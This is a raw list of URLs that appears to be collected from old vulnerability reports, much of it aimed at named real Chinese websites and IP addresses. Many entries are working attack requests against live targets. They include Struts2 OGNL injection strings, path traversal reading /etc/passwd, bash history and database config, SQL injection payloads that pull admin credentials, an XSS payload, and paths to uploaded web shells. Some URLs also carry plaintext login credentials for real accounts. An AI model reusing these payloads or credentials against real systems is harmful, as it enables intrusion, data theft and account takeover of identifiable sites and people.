http://www.hncz.gov.cn:8002/manager/html http://jx.kandian.189.cn/feedback_listThemes.xhtml?redirect%3A%24%7B%23req%3D%23context.get%28%27com.opensymphony.xwork2.dispatcher.HttpServletRequest%27%29%2C%23a%3D%23req.getSession%28%29%2C%23b%3D%23a.getServletContext%28%29%2C%23c%3D%23b.getRealPath%28%22%2F%22%29%2C%23matt%3D%23context.get%28%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27%29%2C%23matt.getWriter%28%29.println%28%23c%29%2C%23matt.getWriter%28%29.flush%28%29%2C%23matt.getWriter%28%29.close%28%29%7D http://v.ifeng.com/v/news/zhhzrbzj/index.shtml#012ebafd-8707-47c7-a74c-2f1fa6c643b6 http://101.95.48.76/view.action?page=/layout/browser.free http://spider2.enorth.com.cn:8000/order/admin/main2.jsp www.syyxzz.com http://www.nclggq.com/szwyadmin/login.asp http://www.bjadks.com/index.html http://public.wsbgt.com/ http://public.wsbgt.com/web/KnowledgePoints.aspx?PLTagID=3&ShortName=R http://public.wsbgt.com/Web/History3.aspx?objtype=zgls&dtype=69&type1=0901&type2=2 http://public.wsbgt.com/Web/N_ColorfulThree.aspx?pltid= http://zdcg.517na.com/): http://oa.tmd56.com/ http://www.yzhtxx.com/Code/Common/SystemCodeList.aspx?Method=GetCodeTepyBy¶mFileName=1¶mValue=1¶mRturnValue=1 http://www.yzzqzx.com/Code/Common/SystemCodeList.aspx?Method=GetCodeTepyBy¶mFileName=1¶mValue=1¶mRturnValue=1 http://www.yjqedu.net/Code/Common/SystemCodeList.aspx?Method=GetCodeTepyBy¶mFileName=1¶mValue=1¶mRturnValue=1 http://www.1s1w.cn/Code/Common/SystemCodeList.aspx?Method=GetCodeTepyBy¶mFileName=1¶mValue=1¶mRturnValue=1 http://www.51jiemian.com/Code/Common/SystemCodeList.aspx?Method=GetCodeTepyBy¶mFileName=1¶mValue=1¶mRturnValue=1 http://gxnngy.com/Code/Common/SystemCodeList.aspx?Method=GetCodeTepyBy¶mFileName=1¶mValue=1¶mRturnValue=1 http://www.zxsdszx.com/Code/Common/SystemCodeList.aspx?Method=GetCodeTepyBy¶mFileName=1¶mValue=1¶mRturnValue=1 http://www.yzwxzx.net/Code/Common/SystemCodeList.aspx?Method=GetCodeTepyBy¶mFileName=1¶mValue=1¶mRturnValue=1 
http://www.yzhtxx.com/Code/Common/SystemCodeList.aspx?Method=GetCodeTepyBy¶mFileName=1¶mValue=1¶mRturnValue=1 http://www.yzzqzx.com/Code/Common/SystemCodeList.aspx?Method=GetCodeTepyBy¶mFileName=1¶mValue=1¶mRturnValue=1 http://www.yjqedu.net/Code/Common/SystemCodeList.aspx?Method=GetCodeTepyBy¶mFileName=1¶mValue=1¶mRturnValue=1 http://www.1s1w.cn/Code/Common/SystemCodeList.aspx?Method=GetCodeTepyBy¶mFileName=1¶mValue=1¶mRturnValue=1 http://www.zxsdszx.com/Code/Common/SystemCodeList.aspx?Method=GetCodeTepyBy¶mFileName=1¶mValue=1¶mRturnValue=1 http://www.yygy.net/ws2004/sysManage/Resource/add/editResource.asp?Id=11 http://www.frxinzhong.cn/ws2004/sysManage/Resource/add/editResource.asp?Id=11 http://www.sdwhys.com/ws2004/sysManage/Resource/add/editResource.asp?Id=1 http://www.zjk2z.cn/ws2004/sysManage/Resource/add/editResource.asp?Id=1 http://www.yzsx.net.cn/ws2004/sysManage/Resource/add/editResource.asp?Id=1 http://fn-sso.ceair.com:7010/sso/sso-login.do http://wooyun.org/bugs/wooyun-2010-039293 http://61.55.135.106:8035 http://61.55.135.106:8035/ckfinder/ckfinder.html http://wyx.creditease.cn/manage/index.action http://www.51job.com/shenzhen?passport_loginname=15575376425&passport_password=zhuben456123&submit=%B5%C7%C2%BC http://www.51job.com/changsha?passport_loginname=2925765132@qq.com&passport_password=qweasd&submit= http://223.87.19.5/settings/download.jsp?file=settings/download.jsp&real=1 http://223.87.19.5/settings/download.jsp?file=../../../../../etc/passwd&real=1&real=1 http://223.87.19.5/settings/download.jsp?file=../../../../../root/.bash_history&real=1&real=1 http://223.87.19.5:9999/ http://hvsop.youku.com/list.php?music=1 http://apt.feng.com/index.php?r=album/detail&albumid=546a12ea0e1d15a5128b48c5 http://wapah.189.cn/zt/j/ty/si.jsp?_tid=../../WEB-INF/web.xml%3f http://wapah.189.cn/zt/j/ty/si.jsp?_tid=../../WEB-INF/zt_config.xml%3f http://wapah.189.cn/zt/j/ty/si.jsp?_tid=../../WEB-INF/robotsrc.txt%3f 
http://www.beij.12306.cn/Dzsw/Shky/hwky.wai/index.action http://log.sslibrary.com/servlet/AddPageRecords?username=ssgpgzsstsg&page=/library.jsp&time=1415194807924 http://game.wo.com.cn/wap_new/game_list.jsp?cla=yx&typesid=5 http://game.wo.com.cn/wap_new/info_list.jsp?cla=zx&typesid=4 http://221.228.204.53:8080/(别问我为什么这个是金山的,看看54和46) http://221.228.204.53:8080/N-grammar/web/ui/ http://k.pcauto.com.cn/questionadd.html http://gys.zs-hospital.sh.cn:8002/ http://www.ahjp.com.cn/Freight.asp?SName=%E8%B4%A7%E8%BF%90%E5%85%AC%E5%91%8A www.sg.bnu.edu.cn www.jiemian.com http://game.wo.com.cn/getgamejy?pageNo=2&pageSize=10&type=gameList&typesid=1%20AND%203*2*1%3d6%20AND%20183%3d183&userSystem=Java http://game.wo.com.cn/delete.jsp http://211.90.75.34 http://211.90.75.35 http://211.90.75.35/upload/files/20141118130949furZ2e3M.jsp http://www.phoenixcne.de/video_window.php?news_id=135536 http://www.phoenixcne.de//video_window.php?news_id=135536+and+1=1 http://www.phoenixcne.de//video_window.php?news_id=135536+and+1=2 http://www.phoenixcne.de//video_window.php?news_id=135536+and+1=2+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18-- http://www.phoenixcne.de/robots.txt http://www.phoenixcne.de//myadmin/login.php http://www.phoenixcne.de//myadmin/login.php http://mail.gjxfj.gov.cn http://mail.gjxfj.gov.cn/php/bill/print_addfeelog.php http://mail.gjxfj.gov.cn/php/bill/script/index1.php http://www.phoenixcne.de/caiji_news_content.php?news_id=136033 http://www.phoenixcne.de/caiji_news_content.php?news_id=136033 http://mail.hoolai.com/res/I18nMsg,AjxMsg,ZMsg,ZmMsg,AjxKeys,ZmKeys,ZdMsg,Ajx%20TemplateMsg.js.zgz?v=091214175450&skin=../../../../../../../../../etc/passwd%00 http://www.wandafilm.com/ http://www.wandafilm.com/user/order_mgr.do?m=orderCancel&orderId=20141118164112671006×tamp=Tue%20Nov%2018%202014%2016:48:48%20GMT+0800&_=1416300528027 
http://www.wandafilm.com/user/order_mgr.do?m=orderCancel&orderId=20141118164112671006×tamp=Tue%20Nov%2018%202014%2016:48:48%20GMT+0800&_=1416300528027 http://www.samsoncn.com/product/Customers.aspx Google:https://wen.lu/#q=inurl:%2Foa%2Fdarticle.aspx&btnK=Google+%E6%90%9C%E7%B4%A2 http://tis.hrbeu.edu.cn http://www.cjebm.org.cn http://xbskb.ysu.edu.cn http://www.j-smu.com http://www.hxyxqk.com.cn http://heuxb.hrbeu.edu.cn http://lkkf.njfu.edu.cn http://www.psytxjx.com http://www.xfcjwkzazhi.cn http://www.zgpwzz.com http://jee.ieecas.cn http://xxzz.cintcm.com http://www.ydsjjs.com http://yxxb.xjtu.edu.cn http://jxyj.ysu.edu.cn http://xb.hznu.edu.cn http://emc.hrbust.edu.cn http://www.zgxxwkzz.com http://www.syfsxzz.com.cn http://gjzy.cintcm.com http://www.cjam.net.cn http://www.qbzz.org http://www.cibj.com http://www.zgmnwk.com http://xbskb.jssvc.edu.cn http://www.jwit.org.cn http://xbskb.jssvc.edu.cn http://xbzrb.tjujournals.com http://www.cjcep.com http://www.fmmuxb.cn http://dlxb.nefu.edu.cn http://qhxb.lib.tsinghua.edu.cn http://slgc.nefu.edu.cn http://jjlyj.csuft.edu.cn http://hlgxb.hrbust.edu.cn http://www.cjrccm.com http://xbzkb.jssvc.edu.cn http://xuebao.ysu.edu.cn http://www.ddgzyckx.com http://www.lsjg.cn http://jhau.paperopen.com http://skxb.csuft.edu.cn http://zgwstj.paperonce.org http://nldxb.njfu.edu.cn http://xuebao.zjc.edu.cn http://journal.lut.cn http://youth.nenu.edu.cn/erji.php?id=5073 https://wordpress.org/news/2014/08/wordpress-3-9-2/ https://github.com/chenlian2015/elexchrome/blob/efe440aa96368fe03dac9419b7ec6d1de84aab8c/studydoc/%E5%B8%90%E5%8F%B7.txt https://my.hoolai.com/ http://222.38.2.232:8080/ http://ueditor.baidu.com/website/umeditor.html inurl:newsDetail.do?newsId http://www.xmfls.net/foreign!more.do?mark=1 http://www.xmblxx.com/foreign!more.do?mark=1 http://www.datong.xmedu.cn/foreign!more.do?mark=1 http://61.178.20.150/more.asp?typeid=0002&borderid=0019 http://218.199.176.2 http://rjxy.hrbu.edu.cn/article/list_search.jsp 
http://jpkc.hrbu.edu.cn:8080/jpkcjs/sm/index2.asp http://sjxy.hrbu.edu.cn/article/list_tzgg.jsp http://jwcdata.hrbu.edu.cn:8080/wjxz2.jsp http://rjxy.hrbu.edu.cn/admin http://sjxy.hrbu.edu.cn/admin http://www.leshan-hospital.com.cn/viewgov.asp?id=2 http://diantai.ifeng.com http://platform.netfield.cn/login http://platform.netfield.cn/cmd.jsp http://www.jdzzyw.com/login http://www.jdzzyw.com/cmd.jsp http://www.bjtjzx.com/bgcx/ http://www.bjtjw.net/bjtjw/index.html,和北京市体检中心不是一个网站,找到这个洞很久了,一直没提交,还是赶快提交了,省的重复了) www.bjtjzx.com http://www.bjtjzx.com www.cnpcscc.com.cn http://www.cnpcscc.com.cn/csccpmp/Handler/GetCommon.ashx http://www.cnpcscc.com.cn/csccpmp/TTUploadPictureDialog.aspx http://www.cnpcscc.com.cn/csccpmp/Doc/XML/help2014111820111349.aspx http://www.cnpcscc.com.cn/csccpmp/TTUploadFileWithDialog.aspx http://www.cnpcscc.com.cn/csccpmp/Doc/XML/help2014111820110669.aspx http://www.kdnet.net/ http://upfile1.kdnet.net/upload_chen_rong.php http://upfile1.kdnet.net/Upload/2014/11/18/14163112658570364.html http://oa.gwbnsh.net.cn/help.aspx http://xpshop.cn http://hzp.xpshop.cn http://etp.xpshop.cn/admin http://www.yzhtxx.com/Code/Common/SysCommonAttach.aspx?Method=UpdateFile http://www.yzzqzx.com/Code/Common/SysCommonAttach.aspx?Method=UpdateFile http://www.yjqedu.net/Code/Common/SysCommonAttach.aspx?Method=UpdateFile http://www.1s1w.cn/Code/Common/SysCommonAttach.aspx?Method=UpdateFile http://gxnngy.com/Code/Common/SysCommonAttach.aspx?Method=UpdateFile http://www.zxsdszx.com/Code/Common/SysCommonAttach.aspx?Method=UpdateFile http://www.yzwxzx.net/Code/Common/SysCommonAttach.aspx?Method=UpdateFile http://******.com/Code/Common/SysCommonAttach.aspx?Method=UpdateFile http://www.yzhtxx.com/Code/Common/SysCommonAttach.aspx?Method=UpdateFile http://www.1s1w.cn/Code/Common/SysCommonAttach.aspx?Method=UpdateFile http://www.zxsdszx.com/Code/Common/SysCommonAttach.aspx?Method=UpdateFile http://www.yzwxzx.net/Code/Common/SysCommonAttach.aspx?Method=UpdateFile 
http://www.yjqedu.net/Code/Common/SysCommonAttach.aspx?Method=UpdateFile http://v2014.rccms.com/上注册一个企业账户,企业类型选择“我是院校”。 https://www.99bill.com/fiquery/customorder/managecustomorder.htm?payto=admin@sumly.cn http://www.99bill.com/fiquery/customorder/managecustomorder.htm?email=shdongfanghong@126.com https://www.99bill.com/mbrentry/signup/signupresendemail.htm?signupId=16267255 https://www.99bill.com/mbrentry/signup/signupresendemail.htm?signupId=16267255 http://www.99bill.com/forgetpwd/findpassword/validateMobileVerifyCode.htm?idContent=185*********** index.php/article-guanyuwomen-lists-1*.html http://www.laiyifen.com:80/ www.laiyifen.com http://ciid.com.cn/hr/designer.php?uid=90 site:www.233.com/NewsFiles/ http://www.025journal.com/ http://www.cjge-manuscriptcentral.com/Tougao/UserEdit.aspx?IsAdd=1&type=1&IsTop=1 http://www.lcmzxzz.com/Tougao/UserEdit.aspx?IsAdd=1&type=1&IsTop=1 http://j.chinatransducers.com/Tougao/UserEdit.aspx?IsAdd=1&type=1&IsTop=1 http://gaojian.xhnj.com/Tougao/UserEdit.aspx?IsAdd=1&type=1&IsTop=1 http://xb.cuit.edu.cn/Tougao/UserEdit.aspx?IsAdd=1&type=1&IsTop=1 http://www.jsnyxb.com/Tougao/UserEdit.aspx?IsAdd=1&type=1&IsTop=1 http://www.lcsjwk.com/Tougao/UserEdit.aspx?IsAdd=1&type=1&IsTop=1 http://www.linpi.net/Tougao/UserEdit.aspx?IsAdd=1&type=1&IsTop=1 http://www.mfskin.net/Tougao/UserEdit.aspx?IsAdd=1&type=1&IsTop=1 http://wooyun.org/bugs/wooyun-2010-040647 https://forum.90sec.org/forum.php?mod=viewthread&tid=2974 http://mail.chinacomm.com.cn/webmail/getPass1.php?email=wcm@chinacomm.com.cn&update=s http://wooyun.org/bugs/wooyun-2010-061894 http://mail.chinacomm.com.cn/webmail/client/cache/649/14163606016.jpg/.php http://auth.coolyun.com http://www.xitic.cn/front/download.do?path=/uploads/2013/04/24/../../../../WEB-INF/web.xml&id= http://www.xitic.cn/front/download.do?path=/uploads/2013/04/24/../../../../WEB-INF/classes/conf/jdbc.properties&id= http://www.xitic.cn/front/download.do?path=/uploads/2013/04/24/../../../../../../../etc/passwd&id= 
https://smile.wanda.cn/mobile http://smile.wanda.cn/mobile/praise/index http://www.zbzx.edu.cn/shengwuchanpin_shop/vpro.asp?id=738 http://www.zhuhai.gd.cn/ http://www.025journal.com/ http://www.gjmzyfs.com/web/ViewAbstract.aspx?GaoHao=IJ20130428 http://www.cjge-manuscriptcentral.com/Web/ViewAbstract.aspx?GaoHao=wcbx12000102 http://www.lcmzxzz.com/Web/ViewAbstract.aspx?GaoHao=mz11001028 http://gaojian.xhnj.com/Web/ViewAbstract.aspx?GaoHao=NJ11000389 http://xb.cuit.edu.cn/Web/ViewAbstract.aspx?GaoHao=xx12000105 http://j.chinatransducers.com/Web/ViewAbstract.aspx?GaoHao=cg12000968 http://ctc.hlglzz.com/web/ViewAbstract.aspx?GaoHao=hl14001736 http://www.jsnyxb.com/Web/ViewAbstract.aspx?GaoHao=nky12000647 http://smile.wanda.cn/mobile/praise/details/img_id/46194 http://smile.wanda.cn/mobile/review/getdel/imgid/512 http://diantai.ifeng.com/ http://diantai.ifeng.com/index.php/user/myaudio http://admin.diantai.ifeng.com/ http://bbs.meizu.cn/live.html http://223.100.112.36/userLoginAction.action http://223.100.112.50/userLoginAction.action http://110.212.70.77 http://110.228.199.65 http://110.244.147.176 http://111.1.182.202 http://111.2.94.222 http://111.3.152.115 http://112.11.36.127 http://112.65.143.74 http://113.2.99.4 http://113.204.99.154 http://117.147.8.125 http://119.112.134.73 http://119.251.140.147 http://120.198.135.83 http://120.199.209.168 http://120.203.12.91 http://120.236.136.212 http://121.16.249.176 http://121.22.107.251 http://122.138.32.126 http://122.193.249.54 http://122.91.210.111 http://123.134.167.90 http://123.65.242.151 http://123.65.59.35 http://123.66.208.198 http://123.79.217.178 http://123.92.91.145 http://124.67.253.200 http://183.234.16.194 http://183.238.196.199 http://183.246.137.180 http://183.246.167.54 http://183.246.78.84 http://183.247.158.148 http://202.107.2.50 http://219.233.23.122 http://221.123.145.22:80 http://221.123.191.58:80 http://221.200.122.224 http://221.210.224.229 http://222.179.18.14 http://222.179.18.31 
http://222.179.18.36 http://222.179.18.43:80 http://222.179.18.52:80 http://222.179.18.53:80 http://222.179.18.58:80 http://222.179.18.67:80 http://222.179.23.130 http://222.41.148.110 http://222.49.203.160 http://223.92.122.207 http://223.94.1.253 http://223.95.174.120 http://223.95.180.62 http://27.204.10.192 http://39.182.69.222 http://39.186.56.134 http://58.18.185.188 http://58.18.250.254 http://58.241.183.204 http://58.244.181.178 http://60.11.233.42 http://60.12.44.238 http://60.18.97.148 http://60.212.255.55 http://60.6.12.213 http://60.8.213.170 http://61.148.123.10 http://61.176.96.218 http://61.176.96.218 http://110.252.177.251 http://110.252.254.132 http://110.252.254.176/ http://112.10.242.196 http://112.14.155.139 http://112.195.121.161 http://115.85.227.193 http://117.184.7.58 http://119.251.197.242 http://120.10.254.185/ http://120.11.249.166 http://120.11.249.228 http://120.11.252.247 http://120.11.252.83 http://120.11.85.245/ http://121.16.213.171 http://121.16.213.66 http://121.23.84.8 http://123.65.200.240 http://123.65.61.86 http://183.247.212.118 http://211.140.158.46 http://218.25.150.70 http://218.26.187.222/ http://220.249.152.136 http://220.249.152.50 http://221.204.225.158 http://222.179.18.10/ http://222.179.18.13/ http://222.179.18.16:80 http://222.179.18.17/ http://222.179.18.18/ http://222.179.18.19/ http://222.179.18.20/ http://222.179.18.21/ http://222.179.18.25/ http://222.179.18.34/ http://222.179.18.51:80 http://223.86.79.176 http://39.183.203.158 http://58.244.227.70/ http://202.102.40.43/admin_login.htm http://phs.js.vnet.cn/CK?act=0&intro=http://www.wooyun.org&u=http://218.94.86.51/servlet/LoginServlet@2 http://www.wahaha.com.cn/FSDownloadServlet?file_key=20131119175139016379.jpg&file_name=erwei.jpg http://en.wahaha.com.cn/news/newsdetail.jsp?content_id=14 http://youth.sicnu.edu.cn:2525/admin/login.asp http://bbs.mgame.baidu.com/config/config_ucenter.php 
http://nc.womaiapp.com/service/~iufo/com.ufida.web.action.ActionServlet?action=nc.ui.iufo.release.InfoReleaseAction&method=createBBSRelease&TreeSelectedID=&TableSelectedID= http://nc.womaiapp.com/service/~iufo/com.ufida.web.action.ActionServlet?action=nc.ui.iufo.release.InfoReleaseAction&method=createBBSRelease&TreeSelectedID=&TableSelectedID= http://112.65.254.133:8080 http://112.65.254.133:8080/web-console/ http://112.65.254.133:8080/jmx-console/ http://help.mail.163.com/ http://help.mail.163.com/user/reply.do?m=view&feedbackID=279614 http://175kh.com/www.zip http://175kh.com/admin2014/ http://175kh.com/admin2014/ebak/admin.php http://www.zyaic.gov.cn/ http://www.zyaic.gov.cn/recommend.php?action=&aid=1&_FILES[type][tmp_name]=\%27%20%20or%20mid=@%60\%27%60%20/*!50000union*//*!50000select*/1,2,3,%28select%20CONCAT%280x7c,userid,0x7c,pwd%29+from+%60%23@__admin%60%20limit+0,1%29,5,6,7,8,9%23@%60\%27%60+&_FILES[type][name]=1.jpg&_FILES[type][type]=application/octet-stream&_FILES[type][size]=6878 http://www.025journal.com/ http://www.cjge-manuscriptcentral.com/tougao/GetInfo.aspx?type=getwkqi&value=1 http://www.lcmzxzz.com/tougao/GetInfo.aspx?type=getwkqi&value=1 http://gaojian.xhnj.com/tougao/GetInfo.aspx?type=getwkqi&value=1 http://xb.cuit.edu.cn/tougao/GetInfo.aspx?type=getwkqi&value=1 http://j.chinatransducers.com/tougao/GetInfo.aspx?type=getwkqi&value=1 http://www.chinaelectrondevices.com/tougao/GetInfo.aspx?type=getwkqi&value=1 http://www.linpi.net/tougao/GetInfo.aspx?type=getwkqi&value=1 http://www.jsnyxb.com/tougao/GetInfo.aspx?type=getwkqi&value=1 http://www.lcsjwk.com/tougao/GetInfo.aspx?type=getwkqi&value=1 http://www.mfskin.net/tougao/GetInfo.aspx?type=getwkqi&value=1 http://www.gjmzyfs.com/tougao/GetInfo.aspx?type=getwkqi&value=1 index.php/openapi/pam_callback/login/module/pam_passport_basic/type/member/appid/b2c/redirect/L2luZGV4LnBocC9wYXNzcG9ydC1wb3N0X2xvZ2luLUwybHVaR1Y0TG5Cb2NDOXRaVzFpWlhJdWFIUnRiQT09Lmh0bWw%3D http://www.laiyifen.com:80/ 
www.laiyifen.com http://www.firstjob.com.cn/eduEnt/private/searchInfo/dacx.action?enterpriseCode=132206043&queryEnterpriseCode=132206043&dw_status=0 www.jnbjrc.gov.cn https://github.com/mn-works/miit/blob/d3534db612173f8e51f6671490d33b0f824219b4/registration-test.php http://stu99.nknu.edu.tw/cgi-bin/openwebmail/openwebmail.pl http://stu99.nknu.edu.tw/ http://www.jl-n-tax.gov.cn/bc/list.jsp?sort_id=2080 http://www.wooyun.org/bugs/wooyun-2010-083808/trace/90b043d5ef1c8dc4e99d9caa0352adc5 http://gs.tmu.cn/new-2012/news/2014/141114.htm http://tjykdx.pcwlkj.cn/ http://203.195.196.198:86/ http://203.195.196.198:86/admin/syslogin.aspx?result=4 http://203.195.196.198:86/admin/global/global_templatesedit.aspx?path=../editor/&filename=222.aspx http://203.195.196.198:86/editor/222.aspx http://cosmetics.ifeng.com/shuangmei/p_37963_698.html http://service.caijing.com.cn/.svn/entries http://蛋疼.com http://www.brtpawn.com/ http://www.brtpawn.com/index.php/Index/newscon/id/3340.html http://www.brtpawn.com/admin.php http://www.haodai.com/account/resetpw/ http://m.rccms.com。 http://m.rccms.com/co/company.php?id=1065 http://m.rccms.com/co/company.php?id=1065%20and http://www.hnbjds.gov.cn:8080/fckeditor//editor/filemanager/browser/default/browser.html?Type=File&Connector=../../connectors/asp/connector.asp/editor/filemanager/browser/default/browser.html?Type=File&Connector=../../connectors/asp/connector.asp www.hnbjds.gov.cn:8080/one8.jsp?f=文件名&t=内容 http://m.rccms.com/person/resume.php?id=696 http://m.rccms.com/person/resume.php?id=696%20and http://m.rccms.com/person/resume.php?id=696%20and%201=1 http://m.rccms.com/person/resume.php?id=696%20and%201=0 http://www.dlcxdrc.com/company.asp?uid=1556 http://www.cxdrc.com/company.asp?uid=1556 http://www.lnbprsrc.com/company.asp?uid=2672 http://job0514.com/company.asp?uid=462 http://www.0857zp.com/company.asp?uid=5 http://www.yczjw.cn/company.asp?uid=80 http://www.fxrsw.cn/rencai/company.asp?uid=973 http://www.qzjyrczx.com/company.asp?uid=89 
http://ysjyj.zgys.gov.cn/company.asp?uid=766 http://www.dlcxdrc.com/persond.asp?uid=3216 http://www.cxdrc.com/persond.asp?uid=3216 http://www.lnbprsrc.com/person.asp?uid=3240 http://job0514.com/person.asp?uid=2192 http://www.0857zp.com/person.asp?uid=97 http://www.yczjw.cn/person.asp?uid=278 http://www.fxrsw.cn/rencai/person.asp?uid=18720 http://www.jobch263.com/person.asp?uid=55834 http://www.qzjyrczx.com/person.asp?uid=378 http://ysjyj.zgys.gov.cn/person.asp?uid=1034 http://vliveachy.tc.qq.com/vwecam.tc.qq.com/1006_4273126e0e36451aab85dd3ad259b1f4.f20.mp4?ptype=http&ocid=1411588012&ocid=227024812 http://bugreport.yulong.com/ http://club.jd.com/Static/js/swfupload.swf?movieName=%22]%29}catch%28e%29{if%28!window.x%29{window.x=1;alert%28/xss/%29}}// http://g.yesky.com/hall/server_info?gid=-9169%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CCONCAT%280x5e5e5e%2CIFNULL%28CAST%28user%28%29%20AS%20CHAR%29%2C0x20%29%2C0x5e5e5e%29%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23&_=1416385564486 http://www.ybc.org.cn/story/youthstorydetail.jsp?positions=15&storypid=408 http://mswkt.xxtyd.fj.cn/data/index?t=1&cat=4 http://hbm.xxtyd.fj.cn/index.php/ajax/getsmsbygrade1.html http://mswkt.xxtyd.fj.cn/data/index?t=1&cat=4 http://hbm.xxtyd.fj.cn/index.php/ajax/getsmsbygrade1.html http://jwc.xju.edu.cn/ZNPK/RoomSel_rpt.aspx?Sel_XQ=1&Sel_JXL=101&Sel_ROOM=1010303&Submit01=%BC%EC%CB%F7&Sel_XNXQ=20140 http://www.strongsoft.net/ http://www.strongsoft.net/ http://work.alibaba-inc.com http://work.alibaba-inc.com/photo/*.jpg(*为工号)就可以看到照片 https://www.supdatasys.cn:6226/order/ http://222.143.253.22:8099/ycb/main.htm user:admin pass:admin http://218.56.39.36 http://203.195.196.198:81/kindeditor/asp/demo.asp http://203.195.196.198:81/kindeditor/asp.net/demo.aspx http://203.195.196.198:81/kindeditor/examples/custom-plugin.html 
http://203.195.196.198:81/kindeditor/examples/custom-theme.html http://203.195.196.198:81/kindeditor/examples/default.html http://203.195.196.198:81/kindeditor/examples/dynamic-load.html http://203.195.196.198:81/kindeditor/examples/file-dialog.html http://203.195.196.198:81/kindeditor/examples/file-manager.html http://203.195.196.198:81/kindeditor/examples/filter-mode.html http://203.195.196.198:81/kindeditor/examples/image-dialog.html http://203.195.196.198:81/kindeditor/examples/index.html http://203.195.196.198:81/kindeditor/examples/multi-language.html http://203.195.196.198:81/kindeditor/examples/newline.html http://203.195.196.198:81/kindeditor/examples/paste-type.html http://203.195.196.198:81/kindeditor/examples/readonly.html http://203.195.196.198:81/kindeditor/examples/simple.html http://203.195.196.198:81/kindeditor/examples/total.html http://203.195.196.198:81/kindeditor/examples/word-count.html http://203.195.196.198:81/kindeditor/examples/url-type.html http://203.195.196.198:81/kindeditor/examples/uploadbutton.html http://203.195.196.198:81/XTGL/Tree.aspx http://203.195.196.198:81/XTGL/Main.aspx http://203.195.196.198:81/XTGL/syssql/sql_execute.aspx http://203.195.196.198:81/XTGL/SysSp/SysSp_Edit.aspx http://203.195.196.198:81/XTGL/SysSp/SysSp_View.aspx http://203.195.196.198:81/XTGL/Searche/Searche_Edit.aspx http://203.195.196.198:81/XTGL/Searche/Searche_List.aspx http://203.195.196.198:81/XTGL/grid_config/grid_config_edit.aspx http://203.195.196.198:81/XTGL/Edit/Edit.aspx http://203.195.196.198:81/XTGL/DataBackup/backup.aspx http://203.195.196.198:81/Two_Dimension_Code/YG_QR_Code.aspx http://203.195.196.198:81/PMT/PMT_main34.aspx http://203.195.196.198:81/PMT/AjaxUpdatexyz.aspx http://cg.cdb.com.cn http://gs.hust.edu.cn/Invite/listNews.jsp?smclsID=65 http://cwc.hnust.cn/CwcxV4/SF40/Axhfind.asp http://cwc.hnust.cn/admin/login.asp http://www.panqiu.com/NewNews/newsalloldnees.aspx?Ty=34这是注入点! 
http://www.panqiu http://202.104.113.11:8081/ http://www.zhejiangmuseum.com http://60.191.2.115:81/index.do?method=index https://sslvpn.nctu.edu.tw/dana-na/auth/url_default/welcome.cgi http://www.so.com/s?psid=572f0ec7e447aecbad9eb3a188c56d06&q=烟草网上订货平台&pq=全省网上订货系统&src=srp&fr=se7_drag http://58.214.20.149/ebp/jsp/base/newsPress/showNews.jsp?newsid=109854 http://www.tobaccosz.com/ebp/jsp/base/newsPress/showNews.jsp?newsid=111 http://222.187.198.252/ebp/jsp/base/newsPress/showNews.jsp?newsid=100322 http://221.230.7.83/ebp/jsp/base/newsPress/showNews.jsp?newsid=104079 http://www.hatobacco.com/ebp/jsp/base/newsPress/showNews.jsp?newsid=101021 http://222.135.77.242:85/jwb/ http://61.141.236.11/ ServiceMobile.asmx/GetRule http://mtodo.wanda.cn/ http://www.mydisk.biz/redirect.php,和HostName:asdf字段。 http://我不告诉你.就是不告诉你/*07J9Q http://b2b.suning.cn/scs/settlement/20101020/dx1002550811211000091034.html http://b2b.suning.cn/scs/settlement/20101020/dx1002945122021000091030.html http://b2b.suning.cn/scs/settlement/20100520/dx1000405017001000083007.html http://b2b.suning.cn/scs/settlement/20110209/dx1001346924001000096784.html http://b2b.suning.cn/scs/settlement/20110319/dx1000406314001000098821.html http://b2b.suning.cn/scs/settlement/20090919/dx1001225325001000070020.html http://219.239.44.26/loginAction!login.action http://219.239.44.26/loginAction!login.action?redirect://baidu.com http://219.239.44.26/loginAction!login.action?redirect%3A%24{%23req%3D%23context.get%28%27com.opensymphony.xwork2.dispatcher.HttpServletRequest%27%29%2C%23a%3D%23req.getSession%28%29%2C%23b%3D%23a.getServletContext%28%29%2C%23c%3D%23b.getRealPath%28%22%2F%22%29%2C%23matt%3D%23context.get%28%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27%29%2C%23matt.getWriter%28%29.println%28%23c%29%2C%23matt.getWriter%28%29.flush%28%29%2C%23matt.getWriter%28%29.close%28%29 http://smile.wanda.cn http://nnsapq.mep.gov.cn/companys.aspx?ctype=-1&keyword=-1 http://www.jdeyes.com 
http://mine.cumt.edu.cn/TM%20system/readnotice.asp?id=42 http://114.215.236.136:28017/ http://**.**.**/login!loginPage.html http://**.**.**/login!loginPage.html http://59.41.59.172/player.php?id=110 www.bjzzcx.com inurl:CnProductShow.asp?id=(中文站) inurl:EnProductShow.asp?id= http://www.sfiasia.com.cn/Island_Oasis/cnProductShow.asp?ID=132&productClass=45 http://www.mc2lighting.com/cnproductshow.asp?id=17 http://www.aisat.com.cn/cnProductShow.asp?id=23 http://www.kingdom-hardware.com/ware/cnproductshow.asp?ID=292 http://www.yongzhan.net/zhan/cnproductshow.asp?ID=280 http://led0579.com/cnproductshow.asp?big=42&id=444 http://www.tcmile.com/tl/cnproductshow.asp?id=27 http://www.amplestarenterprises.com/cnproductShow.asp?ID=146 http://fireworksyiwu.com/cnproductshow.asp?big=4&id=78 http://www.led0579.com/cnproductshow.asp?big=45&id=451 http://leyiduo.com/enproductshow.asp?id=117 http://www.gdolair.com/EnProductShow.asp?ID=345 http://www.sansentech.com/EnProductShow.asp?ID=117 http://www.loyaltoy.com/enProductShow.asp?ID=4111 http://eewell.com/EnProductShow.asp?ID=343 http://www.smwjw.com/sm/EnProductShow.asp?ClassID=20&ID=702 http://www.sehon.net/sh/enproductshow.asp?id=1963 http://www.econuodigital.com/enProductShow.asp?ID=281 http://www.szsuniu.com/enProductShow.asp?ID=339 http://www.dhltchem.com/EnProductShow.asp?ID=103 http://www.morewintyre.com/enProductshow.asp?ID=139 http://www.gdwenshen.com/enProductShow.asp?ID=8458 http://www.ywclock.com/web/EnProductShow.asp?ID=304 